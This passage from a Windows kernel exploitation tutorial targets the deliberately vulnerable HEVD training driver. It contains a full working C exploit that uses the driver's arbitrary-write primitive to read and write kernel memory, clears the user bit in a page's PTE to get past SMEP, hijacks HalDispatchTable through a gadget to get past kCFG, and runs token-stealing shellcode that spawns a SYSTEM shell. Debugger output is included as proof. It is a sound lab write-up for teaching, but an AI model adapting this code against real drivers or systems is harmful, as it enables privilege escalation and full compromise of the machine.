So the code defines these offsets. And yes, we are hardcoding them, which ties the exploit to this exact ntoskrnl.exe build. I don’t want to fall down another rabbit hole trying to resolve them dynamically:

#define MIGETPTEADDRESS_PTEBASE_RVA 0x00298793ULL
#define MMPTEBASE_RVA               0x00CFB358ULL

Then it reads both values from kernel memory:

  
pteBaseFromMiGet = ReadQWORD(hDevice, ntBase + MIGETPTEADDRESS_PTEBASE_RVA);
pteBaseFromMmPteBase = ReadQWORD(hDevice, ntBase + MMPTEBASE_RVA);

Both should resolve to the same PTE base. In this case:

0xFFFF858000000000

Reading both is useful because it gives us a sanity check. If both values match, we can be more confident that the PTE base is correct.
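
The sanity check can be made a little stricter than "both values match". The sketch below assumes that the PTE region occupies exactly one top-level (PML4) slot, so a plausible base sits in the kernel half and is 512 GB aligned. The helper names are hypothetical, and this is not the check the exploit code performs.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Assumption: the PTE region spans one PML4 slot, so its base should be
 * 512 GB aligned and located in the kernel half of the address space. */
static bool looks_like_pte_base(uint64_t candidate)
{
    const uint64_t kernel_half_start = 0xFFFF800000000000ULL;
    const uint64_t slot_mask = (1ULL << 39) - 1;  /* 512 GB - 1 */

    return candidate >= kernel_half_start && (candidate & slot_mask) == 0;
}

/* Returns the agreed base, or 0 if the sources disagree or look wrong. */
static uint64_t cross_check_pte_base(uint64_t from_mi_get,
                                     uint64_t from_mm_pte_base)
{
    if (from_mi_get != from_mm_pte_base) {
        return 0;
    }
    return looks_like_pte_base(from_mi_get) ? from_mi_get : 0;
}

/* Which of the 512 top-level slots the PTE region occupies. */
static unsigned pte_base_slot_index(uint64_t pte_base)
{
    assert(looks_like_pte_base(pte_base));
    return (unsigned)((pte_base >> 39) & 0x1FF);
}
```

With the value from this target, `cross_check_pte_base(0xFFFF858000000000, 0xFFFF858000000000)` returns the base unchanged, and the slot index works out to 0x10B.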

Once the shellcode is allocated with VirtualAlloc, we have a user-mode virtual address:

  
shellcodeAddress = VirtualAlloc(
    NULL,
    sizeof(shellcode),
    MEM_COMMIT | MEM_RESERVE,
    PAGE_EXECUTE_READWRITE
);

The page is executable because we used PAGE_EXECUTE_READWRITE, but it is still a user-mode page. That means SMEP will block it if kernel mode tries to execute it.

The new code calculates the PTE address for this shellcode page:

  
QWORD shellcodePteAddress = GetPteAddress(
    (QWORD)shellcodeAddress,
    pteBase
);

Then it reads the original PTE:

  
QWORD originalPte = ReadQWORD(hDevice, shellcodePteAddress);

At this point, the PTE should describe a valid, user-accessible, executable page. The code defines the important PTE permission bits:

#define PTE_VALID_BIT             0x1ULL
#define PTE_WRITE_BIT             0x2ULL
#define PTE_USER_SUPERVISOR_BIT   0x4ULL
#define PTE_NX_BIT                0x8000000000000000ULL

The Valid bit tells us whether the page is present. If this bit is not set, the PTE is not usable and the calculation is probably wrong.

The Write bit tells us whether the page is writable. This is useful for debugging, but not the main SMEP bypass bit.

The User/Supervisor bit is the SMEP-relevant bit. If this bit is set, the page is a user page. We want to clear it.

The NX bit means No Execute. If NX is set, the CPU will refuse to execute this page even if SMEP is bypassed. Since the shellcode was allocated with PAGE_EXECUTE_READWRITE, NX should already be clear. The code checks it anyway because if NX is set, clearing the User/Supervisor bit would not be enough. We would fix SMEP, but still hit a no-execute fault.

The actual PTE overwrite is tiny:

  
QWORD modifiedPte = originalPte & ~PTE_USER_SUPERVISOR_BIT;

Since PTE_USER_SUPERVISOR_BIT is 0x4, this clears bit 2.

Then the arbitrary write primitive writes the modified PTE back into kernel memory:

  
WriteQWORD(hDevice, shellcodePteAddress, modifiedPte);

After that, the code reads it back:

  
QWORD verifyPte = ReadQWORD(hDevice, shellcodePteAddress);

This read-back matters because it gives us before-and-after evidence:

Original PTE: U bit set
Modified PTE: U bit cleared
Verified PTE: U bit still cleared

This proves the arbitrary write successfully changed the page-table permissions.
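
The read, modify, write, verify sequence can be exercised without touching a kernel. In the sketch below, the read and write callbacks are hypothetical stand-ins for `ReadQWORD` and `WriteQWORD` that operate on an ordinary variable, and the starting value `0x38E1E867` in the note is an assumed "before" PTE, not one captured from the target.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define PTE_USER_SUPERVISOR_BIT 0x4ULL

/* Hypothetical stand-ins for the exploit's ReadQWORD/WriteQWORD. */
typedef uint64_t (*read_qword_fn)(void *ctx);
typedef bool (*write_qword_fn)(void *ctx, uint64_t value);

/* Fake primitives: they touch a local variable, not kernel memory. */
static uint64_t fake_read(void *ctx) { return *(uint64_t *)ctx; }
static bool fake_write(void *ctx, uint64_t value)
{
    *(uint64_t *)ctx = value;
    return true;
}

/* Clear U/S, write the PTE back, re-read it, and hand the original value
 * to the caller so it can be restored during cleanup. */
static bool clear_user_bit(read_qword_fn rd, write_qword_fn wr, void *ctx,
                           uint64_t *original_out)
{
    assert(rd && wr && original_out);

    uint64_t original = rd(ctx);
    uint64_t modified = original & ~PTE_USER_SUPERVISOR_BIT;

    if (!wr(ctx, modified)) {
        return false;
    }
    if (rd(ctx) & PTE_USER_SUPERVISOR_BIT) {
        return false;  /* the write did not stick */
    }

    *original_out = original;
    return true;
}
```

Starting from a slot holding `0x38E1E867`, the call leaves `0x38E1E863` in the slot and returns `0x38E1E867` as the value to restore later.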

SMEP and NX are different protections. That is why the code checks for the NX bit:

  
if (originalPte & PTE_NX_BIT)
{
    printf("[-] PTE NX bit is set. Your shellcode page is non-executable.\n");
    return FALSE;
}

In this exploit, NX should not be set because the shellcode is allocated as PAGE_EXECUTE_READWRITE. But the check is still useful because it tells us whether a future crash is caused by SMEP or by page execution permissions.
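
A small classifier makes the SMEP versus NX distinction explicit when triaging a crash. This is a sketch under simplifying assumptions: it inspects only the final PTE, ignores the upper paging levels and the CR4/EFER state, and the enum and function names are made up for illustration.

```c
#include <assert.h>
#include <stdint.h>

#define PTE_VALID_BIT            0x1ULL
#define PTE_USER_SUPERVISOR_BIT  0x4ULL
#define PTE_NX_BIT               0x8000000000000000ULL

typedef enum {
    FETCH_OK,
    FETCH_NOT_PRESENT,
    FETCH_BLOCKED_BY_NX,
    FETCH_BLOCKED_BY_SMEP
} fetch_verdict;

/* What would stop a kernel-mode instruction fetch from this page?
 * The order of the checks is this sketch's choice, not the CPU's. */
static fetch_verdict classify_kernel_fetch(uint64_t pte)
{
    if (!(pte & PTE_VALID_BIT))          return FETCH_NOT_PRESENT;
    if (pte & PTE_NX_BIT)                return FETCH_BLOCKED_BY_NX;
    if (pte & PTE_USER_SUPERVISOR_BIT)   return FETCH_BLOCKED_BY_SMEP;
    return FETCH_OK;
}

static const char *verdict_name(fetch_verdict verdict)
{
    switch (verdict) {
    case FETCH_OK:              return "ok";
    case FETCH_NOT_PRESENT:     return "page not present";
    case FETCH_BLOCKED_BY_NX:   return "blocked by NX";
    case FETCH_BLOCKED_BY_SMEP: return "blocked by SMEP";
    }
    assert(!"unknown verdict");
    return "unknown";
}
```

A PTE ending in `...867` with bit 63 clear classifies as blocked by SMEP, while the same value with bit 2 cleared (`...863`) classifies as ok.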

The final exploit order becomes:

Open a handle to HEVD.
Resolve the ntoskrnl.exe base.
Calculate HalDispatchTable+0x8.
Allocate user-mode shellcode with PAGE_EXECUTE_READWRITE.
Resolve the PTE base from MiGetPteAddress+0x13.
Calculate the shellcode page’s PTE.
Read the original PTE.
Clear the User/Supervisor bit.
Verify the PTE overwrite.
Overwrite HalDispatchTable+0x8 with the kCFG-safe jmp rbx gadget.
Trigger NtQueryIntervalProfile.
The HAL callback reaches the kernel gadget.
The gadget executes jmp rbx.
RBX points to the shellcode.
SMEP no longer blocks execution because the page now looks like supervisor memory.
Shellcode steals the SYSTEM token.
Restore HalDispatchTable+0x8.
Spawn cmd.exe.
Restore the original shellcode PTE during cleanup, once the shell exits.

Once this code is complete, it looks like this:

  
#include <windows.h>
#include <stdio.h>
#include <Psapi.h>
#include <string.h>

#pragma comment(lib, "Psapi.lib")

#define QWORD ULONGLONG

#define HEVD_IOCTL_ARBITRARY_WRITE 0x22200B
#define DEVICE_NAME L"\\\\.\\HackSysExtremeVulnerableDriver"

#define HALDISPATCHTABLE_FALLBACK_OFFSET 0xC00A60ULL
#define HAL_ENTRY_OFFSET 0x8ULL
#define ProfileTotalIssues 2

#define IMAGE_SCN_MEM_EXECUTE 0x20000000
#define JMP_RBX_BYTE_1 0xFF
#define JMP_RBX_BYTE_2 0xE3

#define MIGETPTEADDRESS_PTEBASE_RVA 0x00298793ULL
#define MMPTEBASE_RVA               0x00CFB358ULL

#define PTE_VALID_BIT               0x1ULL
#define PTE_WRITE_BIT               0x2ULL
#define PTE_USER_SUPERVISOR_BIT     0x4ULL
#define PTE_NX_BIT                  0x8000000000000000ULL

typedef LONG NTSTATUS;

typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(
    ULONG ProfileSource,
    PULONG Interval
    );

typedef struct _WRITE_WHAT_WHERE
{
    QWORD* What;
    QWORD* Where;
} WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;

BOOL TriggerWriteWhatWhere(HANDLE hDevice, QWORD* what, QWORD* where)
{
    WRITE_WHAT_WHERE request = { 0 };

    request.What = what;
    request.Where = where;

    DWORD bytesReturned = 0;

    return DeviceIoControl(
        hDevice,
        HEVD_IOCTL_ARBITRARY_WRITE,
        &request,
        sizeof(request),
        NULL,
        0,
        &bytesReturned,
        NULL
    );
}

QWORD ReadQWORD(HANDLE hDevice, QWORD kernelAddress)
{
    QWORD value = 0;

    BOOL ok = TriggerWriteWhatWhere(
        hDevice,
        (QWORD*)kernelAddress,
        &value
    );

    if (!ok)
    {
        printf("[-] ReadQWORD failed at 0x%llx. Error=%lu\n",
            kernelAddress,
            GetLastError()
        );
    }

    return value;
}

BOOL WriteQWORD(HANDLE hDevice, QWORD kernelAddress, QWORD valueToWrite)
{
    QWORD value = valueToWrite;

    BOOL ok = TriggerWriteWhatWhere(
        hDevice,
        &value,
        (QWORD*)kernelAddress
    );

    if (!ok)
    {
        printf("[-] WriteQWORD failed at 0x%llx. Error=%lu\n",
            kernelAddress,
            GetLastError()
        );
    }

    return ok;
}

BYTE ReadBYTE(HANDLE hDevice, QWORD kernelAddress)
{
    QWORD alignedAddress = kernelAddress & ~0x7ULL;
    QWORD value = ReadQWORD(hDevice, alignedAddress);

    DWORD shift = (DWORD)((kernelAddress & 0x7ULL) * 8);

    return (BYTE)((value >> shift) & 0xff);
}

QWORD GetKernelBaseAddress(LPCWSTR driverName)
{
    LPVOID drivers[1024] = { 0 };
    DWORD cbNeeded = 0;

    if (!EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded))
    {
        printf("[-] EnumDeviceDrivers failed. Error=%lu\n", GetLastError());
        return 0;
    }

    int driverCount = cbNeeded / sizeof(drivers[0]);

    for (int i = 0; i < driverCount; i++)
    {
        WCHAR currentDriverName[MAX_PATH] = { 0 };

        if (GetDeviceDriverBaseNameW(
            drivers[i],
            currentDriverName,
            MAX_PATH
        ))
        {
            if (_wcsicmp(currentDriverName, driverName) == 0)
            {
                return (QWORD)drivers[i];
            }
        }
    }

    return 0;
}

QWORD GetPteAddress(QWORD virtualAddress, QWORD pteBase)
{
    return pteBase + ((virtualAddress >> 9) & 0x7FFFFFFFF8ULL);
}

BOOL IsCanonicalKernelAddress(QWORD address)
{
    // Canonical kernel-half addresses on x64 start at 0xFFFF800000000000.
    return (address >= 0xFFFF800000000000ULL);
}

void PrintPteBits(const char* label, QWORD pteValue)
{
    printf("[+] %s: P=%llu W=%llu U=%llu NX=%llu Raw=0x%llx\n",
        label,
        (pteValue & PTE_VALID_BIT) ? 1ULL : 0ULL,
        (pteValue & PTE_WRITE_BIT) ? 1ULL : 0ULL,
        (pteValue & PTE_USER_SUPERVISOR_BIT) ? 1ULL : 0ULL,
        (pteValue & PTE_NX_BIT) ? 1ULL : 0ULL,
        pteValue
    );
}

QWORD ResolvePteBase(HANDLE hDevice, QWORD ntBase)
{
    QWORD miGetPteImmediateAddress = ntBase + MIGETPTEADDRESS_PTEBASE_RVA;
    QWORD mmPteBaseVariableAddress = ntBase + MMPTEBASE_RVA;

    QWORD pteBaseFromMiGet = ReadQWORD(hDevice, miGetPteImmediateAddress);
    QWORD pteBaseFromMmPteBase = ReadQWORD(hDevice, mmPteBaseVariableAddress);

    printf("[+] MiGetPteAddress+0x13 VA: 0x%llx\n", miGetPteImmediateAddress);
    printf("[+] MmPteBase variable VA:   0x%llx\n", mmPteBaseVariableAddress);
    printf("[+] PTE base from MiGet:     0x%llx\n", pteBaseFromMiGet);
    printf("[+] PTE base from MmPteBase: 0x%llx\n", pteBaseFromMmPteBase);

    if (IsCanonicalKernelAddress(pteBaseFromMiGet))
    {
        if (pteBaseFromMmPteBase && pteBaseFromMiGet != pteBaseFromMmPteBase)
        {
            printf("[!] PTE base sources differ. Using MiGetPteAddress value.\n");
        }

        return pteBaseFromMiGet;
    }

    if (IsCanonicalKernelAddress(pteBaseFromMmPteBase))
    {
        printf("[!] MiGetPteAddress value looked invalid. Using MmPteBase variable value.\n");
        return pteBaseFromMmPteBase;
    }

    printf("[-] Failed to resolve a valid PTE base\n");
    return 0;
}

BOOL MakePageSupervisor(
    HANDLE hDevice,
    QWORD targetVa,
    QWORD pteBase,
    QWORD* outPteAddress,
    QWORD* outOriginalPte
)
{
    QWORD pteAddress = GetPteAddress(targetVa, pteBase);
    QWORD originalPte = ReadQWORD(hDevice, pteAddress);
    QWORD modifiedPte = 0;
    QWORD verifyPte = 0;

    printf("[+] Target VA:               0x%llx\n", targetVa);
    printf("[+] Target PTE address:      0x%llx\n", pteAddress);
    PrintPteBits("Original PTE", originalPte);

    if (!(originalPte & PTE_VALID_BIT))
    {
        printf("[-] Shellcode PTE is not present/valid. PTE calculation is probably wrong.\n");
        return FALSE;
    }

    if (!(originalPte & PTE_USER_SUPERVISOR_BIT))
    {
        printf("[!] Shellcode PTE is already supervisor. SMEP should not block this page.\n");
    }

    if (originalPte & PTE_NX_BIT)
    {
        printf("[-] Shellcode PTE has NX set. CPU cannot execute this page even after clearing U/S.\n");
        return FALSE;
    }

    modifiedPte = originalPte & ~PTE_USER_SUPERVISOR_BIT;

    PrintPteBits("Modified PTE", modifiedPte);

    if (!WriteQWORD(hDevice, pteAddress, modifiedPte))
    {
        printf("[-] Failed to write modified shellcode PTE\n");
        return FALSE;
    }

    verifyPte = ReadQWORD(hDevice, pteAddress);
    PrintPteBits("Verified PTE", verifyPte);

    if (verifyPte & PTE_USER_SUPERVISOR_BIT)
    {
        printf("[-] Verified PTE still has U/S bit set. SMEP will still block execution.\n");
        return FALSE;
    }

    if (verifyPte & PTE_NX_BIT)
    {
        printf("[-] Verified PTE has NX set. Execution will still fail.\n");
        return FALSE;
    }

    if (outPteAddress)
    {
        *outPteAddress = pteAddress;
    }

    if (outOriginalPte)
    {
        *outOriginalPte = originalPte;
    }

    printf("[+] Shellcode page is now supervisor from the paging perspective.\n");
    return TRUE;
}

unsigned char shellcode[] = {
    0x9c, 0x53, 0x51, 0x52, 0x56, 0x57, 0x55, 0x41,
    0x50, 0x41, 0x51, 0x41, 0x52, 0x41, 0x53, 0x41,
    0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x65,
    0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
    0x48, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x48,
    0x89, 0xc3, 0x49, 0x89, 0xc4, 0x4d, 0x8b, 0xa4,
    0x24, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xec,
    0x48, 0x04, 0x00, 0x00, 0x4d, 0x8b, 0xac, 0x24,
    0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xfd, 0x04,
    0x75, 0xe3, 0x4d, 0x8b, 0xac, 0x24, 0xb8, 0x04,
    0x00, 0x00, 0x49, 0x83, 0xe5, 0xf0, 0x4c, 0x8b,
    0xb3, 0xb8, 0x04, 0x00, 0x00, 0x49, 0x83, 0xe6,
    0x0f, 0x4d, 0x09, 0xf5, 0x4c, 0x89, 0xab, 0xb8,
    0x04, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e, 0x41,
    0x5d, 0x41, 0x5c, 0x41, 0x5b, 0x41, 0x5a, 0x41,
    0x59, 0x41, 0x58, 0x5d, 0x5f, 0x5e, 0x5a, 0x59,
    0x5b, 0x9d, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xc3
};

int main()
{
    HANDLE hDevice = INVALID_HANDLE_VALUE;
    LPVOID shellcodeAddress = NULL;

    QWORD ntBase = 0;
    QWORD halDispatchTable = 0;
    QWORD halDispatchEntry = 0;
    QWORD originalHalEntry = 0;
    QWORD verifyHalEntry = 0;
    QWORD restoredHalEntry = 0;
    QWORD jmpRbxGadget = 0;
    QWORD pteBase = 0;
    QWORD shellcodePteAddress = 0;
    QWORD originalShellcodePte = 0;
    QWORD restoredShellcodePte = 0;

    HMODULE ntdll = NULL;
    NtQueryIntervalProfile_t NtQueryIntervalProfile = NULL;

    BYTE b1 = 0, b2 = 0;

    ULONG interval = 0;
    NTSTATUS status = 0;

    BOOL halOverwritten = FALSE;
    BOOL pteOverwritten = FALSE;

    printf("[+] Opening device: %ls\n", DEVICE_NAME);

    hDevice = CreateFileW(
        DEVICE_NAME,
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );

    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[-] CreateFileW failed. Error=%lu\n", GetLastError());
        return 1;
    }

    ntBase = GetKernelBaseAddress(L"ntoskrnl.exe");

    if (!ntBase)
    {
        ntBase = GetKernelBaseAddress(L"ntkrnlmp.exe");
    }

    if (!ntBase)
    {
        printf("[-] Failed to find ntoskrnl.exe / ntkrnlmp.exe base\n");
        goto cleanup;
    }

    printf("[+] nt base:                 0x%llx\n", ntBase);

    halDispatchTable = ntBase + HALDISPATCHTABLE_FALLBACK_OFFSET;

    halDispatchEntry = halDispatchTable + HAL_ENTRY_OFFSET;

    printf("[+] HalDispatchTable:        0x%llx\n", halDispatchTable);
    printf("[+] HalDispatchTable + 0x8:  0x%llx\n", halDispatchEntry);

    shellcodeAddress = VirtualAlloc(
        NULL,
        sizeof(shellcode),
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE
    );

    if (!shellcodeAddress)
    {
        printf("[-] VirtualAlloc failed. Error=%lu\n", GetLastError());
        goto cleanup;
    }

    memcpy(shellcodeAddress, shellcode, sizeof(shellcode));

    printf("[+] Shellcode address:       0x%p\n", shellcodeAddress);

    printf("[+] Resolving PTE base...\n");

    pteBase = ResolvePteBase(hDevice, ntBase);

    if (!pteBase)
    {
        printf("[-] Failed to resolve PTE base\n");
        goto cleanup;
    }

    printf("[+] Making shellcode page supervisor...\n");

    if (!MakePageSupervisor(
        hDevice,
        (QWORD)shellcodeAddress,
        pteBase,
        &shellcodePteAddress,
        &originalShellcodePte
    ))
    {
        printf("[-] Failed to modify shellcode PTE\n");
        goto cleanup;
    }

    pteOverwritten = TRUE;

    ntdll = GetModuleHandleA("ntdll.dll");

    if (!ntdll)
    {
        printf("[-] GetModuleHandleA(ntdll.dll) failed. Error=%lu\n", GetLastError());
        goto cleanup;
    }

    NtQueryIntervalProfile =
        (NtQueryIntervalProfile_t)GetProcAddress(
            ntdll,
            "NtQueryIntervalProfile"
        );

    if (!NtQueryIntervalProfile)
    {
        printf("[-] Failed to resolve NtQueryIntervalProfile. Error=%lu\n", GetLastError());
        goto cleanup;
    }

    originalHalEntry = ReadQWORD(hDevice, halDispatchEntry);

    if (!originalHalEntry)
    {
        printf("[-] Failed to read original HalDispatchTable entry\n");
        goto cleanup;
    }

    printf("[+] Original HAL entry:      0x%llx\n", originalHalEntry);

    printf("[+] Overwriting HalDispatchTable + 0x8...\n");

    jmpRbxGadget = ntBase + 0x044584a;

    printf("[+] JMP RBX gadget:          0x%llx\n", jmpRbxGadget);

    b1 = ReadBYTE(hDevice, jmpRbxGadget);
    b2 = ReadBYTE(hDevice, jmpRbxGadget + 1);

    printf("[+] Gadget VA:               0x%llx\n", jmpRbxGadget);
    printf("[+] Gadget RVA:              0x%llx\n", jmpRbxGadget - ntBase);
    printf("[+] Gadget bytes:            %02x %02x\n", b1, b2);

    if (b1 != JMP_RBX_BYTE_1 || b2 != JMP_RBX_BYTE_2)
    {
        printf("[-] Not a live jmp rbx gadget. Aborting.\n");
        goto cleanup;
    }

    if (!WriteQWORD(
        hDevice,
        halDispatchEntry,
        jmpRbxGadget
    ))
    {
        printf("[-] Failed to overwrite HalDispatchTable entry\n");
        goto cleanup;
    }

    halOverwritten = TRUE;

    verifyHalEntry = ReadQWORD(hDevice, halDispatchEntry);

    printf("[+] HAL entry after write:   0x%llx\n", verifyHalEntry);

    if (verifyHalEntry != jmpRbxGadget)
    {
        printf("[-] HAL entry verification failed\n");
        goto cleanup;
    }

    printf("[+] Triggering NtQueryIntervalProfile...\n");
    //__debugbreak();

    status = NtQueryIntervalProfile(
        ProfileTotalIssues,
        (PULONG)shellcodeAddress
    );

    printf("[+] NtQueryIntervalProfile returned: 0x%lx\n", status);

    printf("[+] Restoring original HAL entry...\n");

    if (!WriteQWORD(hDevice, halDispatchEntry, originalHalEntry))
    {
        printf("[-] Failed to restore original HAL entry\n");
        goto cleanup;
    }

    halOverwritten = FALSE;

    restoredHalEntry = ReadQWORD(hDevice, halDispatchEntry);

    printf("[+] HAL entry after restore: 0x%llx\n", restoredHalEntry);

    if (restoredHalEntry == originalHalEntry)
    {
        printf("[+] HAL entry restored successfully\n");
    }
    else
    {
        printf("[!] HAL entry restore verification mismatch\n");
    }

    printf("[+] Spawning cmd.exe\n");
    system("cmd.exe");

cleanup:

    if (halOverwritten && originalHalEntry)
    {
        printf("[!] Attempting emergency HAL entry restore...\n");
        WriteQWORD(hDevice, halDispatchEntry, originalHalEntry);
    }

    if (pteOverwritten && shellcodePteAddress && originalShellcodePte)
    {
        printf("[!] Restoring original shellcode PTE...\n");

        if (WriteQWORD(hDevice, shellcodePteAddress, originalShellcodePte))
        {
            restoredShellcodePte = ReadQWORD(hDevice, shellcodePteAddress);
            PrintPteBits("Restored shellcode PTE", restoredShellcodePte);
        }
        else
        {
            printf("[!] Failed to restore original shellcode PTE\n");
        }

        pteOverwritten = FALSE;
    }

    if (shellcodeAddress)
    {
        VirtualFree(shellcodeAddress, 0, MEM_RELEASE);
    }

    if (hDevice != INVALID_HANDLE_VALUE)
    {
        CloseHandle(hDevice);
    }

    return 0;
}

Running this works: we get a SYSTEM shell with both kCFG and SMEP bypassed. Breaking on the gadget with a hardware breakpoint makes the change visible. In the !pte output, the PTE for the shellcode page now shows K (kernel), while the upper-level entries still show U.

0: kd> r
rax=fffff8026284584a rbx=000001ab4f1c0000 rcx=0000000000000001
rdx=0000000000000018 rsi=00000000000000a4 rdi=0000000000000001
rip=fffff8026284584a rsp=ffffb305a824ca68 rbp=ffffb305a824cb80
 r8=ffffb305a824caa0  r9=ffffb305a824cad0 r10=0000fffff8026284
r11=ffffa3fd82e00000 r12=fffff80262d8f9d0 r13=fffff8026284584a
r14=fffff80263000a68 r15=000001ab4f1c0000
iopl=0         nv up ei pl nz ac pe cy
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040217
nt!MiRemoveFromSystemSpace+0x1c037e:
fffff802`6284584a ffe3            jmp     rbx {000001ab`4f1c0000}
0: kd> !pte 000001ab4f1c0000
                                           VA 000001ab4f1c0000
PXE at FFFFA954AA552018    PPE at FFFFA954AA403568    PDE at FFFFA954806AD3C0    PTE at FFFFA900D5A78E00
contains 0A00000038D9C867  contains 0A00000038D9D867  contains 0A00000038D9E867  contains 0000000038E1E863
pfn 38d9c     ---DA--UWEV  pfn 38d9d     ---DA--UWEV  pfn 38d9e     ---DA--UWEV  pfn 38e1e     ---DA--KWEV
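
The last four flag letters and the pfn that !pte prints can be reproduced from the raw entry values above. This is a rough sketch: the helper names are hypothetical, the letter mapping is my reading of the debugger output, and the frame-number mask assumes the architectural bit range 12..51.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Page frame number: bits 12..51 of the entry (assumed architectural range). */
static uint64_t pte_pfn(uint64_t pte)
{
    return (pte >> 12) & 0xFFFFFFFFFFULL;
}

/* Fill `out` with four letters in the style of the tail of the !pte flags:
 * U/K (user or kernel), W/R (writable or read-only),
 * E/- (executable or NX), V/- (valid or not). */
static void pte_flags(uint64_t pte, char out[5])
{
    assert(out != NULL);

    out[0] = (pte & 0x4ULL) ? 'U' : 'K';
    out[1] = (pte & 0x2ULL) ? 'W' : 'R';
    out[2] = (pte >> 63)    ? '-' : 'E';
    out[3] = (pte & 0x1ULL) ? 'V' : '-';
    out[4] = '\0';
}
```

For the PTE value `0x0000000038E1E863` this gives pfn `0x38e1e` and the letters `KWEV`. For the PXE value `0x0A00000038D9C867` it gives pfn `0x38d9c` and `UWEV`, in line with what the debugger shows.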

This started as a simple write-what-where bug, but it turned into a full tour of modern Windows kernel exploitation pain. First, the primitive gave us clean kernel read/write. Then it gave us a no-shellcode token overwrite. Then we tried the classic HalDispatchTable route, watched kCFG slap it out of the air, redirected the call through a kernel gadget, watched SMEP complain next, and finally edited the shellcode page’s PTE so the CPU would treat it as supervisor memory. The important lesson is that modern kernel exploitation is rarely about one magic bug. It is about turning one primitive into the next primitive until Windows runs out of reasons to say no.

References

  
https://connormcgarr.github.io/pte-overwrites/
https://connormcgarr.github.io/Kernel-Exploitation-2/
https://connormcgarr.github.io/paging/
https://areyou1or0.it/index.php/2022/08/13/hevd-windows-kernel-exploitation-2-write-what-where/
https://xavibel.com/2025/07/01/hevd-write-what-where-windows-10-pro-smep-kcfg-kaslr-protections/
https://fuzzysecurity.com/tutorials/expDev/15.html
https://insideyourkernel.com/2025-02-01-windows-10-x64-kernel-exploitation-arbitrary-write-write-what-where-using-hevd.html
https://github.com/ommadawn46/HEVD-Exploit-Win10-22H2-KVAS
https://ommadawn46.medium.com/windows-kernel-exploitation-hevd-on-windows-10-22h2-b407c6f5b8f7

This post is licensed under CC BY 4.0 by the author.